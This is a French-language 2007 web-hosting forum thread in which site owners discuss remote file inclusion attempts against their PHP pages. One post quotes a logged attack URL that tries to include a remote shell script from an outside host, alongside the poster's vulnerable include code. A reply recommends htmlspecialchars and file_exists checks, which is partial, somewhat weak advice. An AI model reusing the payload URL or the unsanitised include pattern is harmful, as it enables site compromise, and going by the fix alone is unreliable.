Forums Webou.net - Hébergement gratuit et sans publicités avec PHP/MySQL

Hébergement Webou.net => Hébergement Webou.net => Discussion démarrée; par: mifyet le 19 Août 2007, 14:54:03



Titre: ..
Posté par: mifyet le 19 Août 2007, 14:54:03
..


Titre: Re: attaques de mon site
Posté par: K@cem le 19 Août 2007, 17:24:50
apparemment ils veulent inclure leurs pages dans ton site pour qu'ils puissent le pirater ...
J'éspère que c'est sécurisé  :o
Ils peuvent faire n'importe quoi si ce n'est aps sécurisé (vider la base de données, supprimer tous tes fichiers, modifier tous le contenu en mettant des adresses pour acheter du viagra ...)

++


Titre: ..
Posté par: mifyet le 20 Août 2007, 13:15:48
..


Titre: Re: attaques de mon site
Posté par: K@cem le 20 Août 2007, 13:39:55
Il faut donc protéger tes pages ...
Il me semble que je t'avais déjà prévenue dans le passé :)



Titre: ..
Posté par: mifyet le 21 Août 2007, 12:07:38
..


Titre: Re: attaques de mon site
Posté par: K@cem le 21 Août 2007, 13:43:50
Oui j'ai protégé quelques variables ...
Il faut protéger chaque variable avec des fonctions comme htmlspecialchars(), ou mysql_real_escape_string() !


Titre: Re: attaques de mon site
Posté par: eclide le 07 Septembre 2007, 10:46:26
Bonjour !

Je rebondis sur votre enfilade : dans les statistiques de mon site http://www.eclide.com/ (http://www.eclide.com/), j'ai régulièrement des visites vers une page </php/eclide.php?lang=http://www.evilc0der.com/r57.txt?>, avec un agent : Mozilla/3.0 (compatible; Indy Library).

Pouvez-vous me confirmer qu'il s'agit de tentatives d'attaques, SVP ?

Dans le code de eclide.php, j'utilise les variables ainsi :

Code:
  $lang = $_GET["lang"];
  $page = $_GET["page"];

puis plus loin :

Code:
                  include "page0".$page.$lang.".txt";

... et j'ai bien sûr des fichiers avec des noms du type : "page01fr.txt" ou "page04en.txt"

Il me semble donc être à l'abri de ces attaques (ci c'en sont), puisque je n'ai pas de fichier "page0http://www.evilc0der.com/r57.txt?.txt"

J'ai d'ailleurs essayé d'appeler la page en lien dans les statistiques, et ai obtenu :
Citation
Warning: include(page0http://www.evilc0der.com/r57.txt?.txt) [function.include]: failed to open stream: No such file or directory in /home/eclide/public_html/php/eclide.php on line 24

Warning: include() [function.include]: Failed opening 'page0http://www.evilc0der.com/r57.txt?.txt' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/eclide/public_html/php/eclide.php on line 24

Pouvez-vous me confirmer que je n'ai pas besoin de prendre d'autres mesures pour sécuriser mon site, SVP ?


D'avance merci pour le temps que vous passerez à me lire et à me répondre.

Bonne journée !

Eclide.


Titre: Re: attaques de mon site
Posté par: K@cem le 07 Septembre 2007, 13:42:14
Il faut mettre :
Code:
  $lang = htmlspecialchars($_GET["lang"]);
  $page = htmlspecialchars($_GET["page"]);

Et là :
Code:
if(file_exists("page0".$page.$lang.".txt"))
include "page0".$page.$lang.".txt";
else
die("Tentative de hack detecté !!");

++


Titre: Re: attaques de mon site
Posté par: eclide le 07 Septembre 2007, 15:19:40
Merci pour ton aide, K@cem !

Mise à jour faite dans la version béta qui sera en ligne vers octobre/novembre.   :)


Bonne journée !

Eclide.


Titre: Re: attaques de mon site
Posté par: K@cem le 07 Septembre 2007, 16:48:50
De rien :)
Mais d'ici octobre/novembre qui sait ce que fera ce p'tit pirate, donc vaut mieux commencer par sécuriser dès maintenant  :D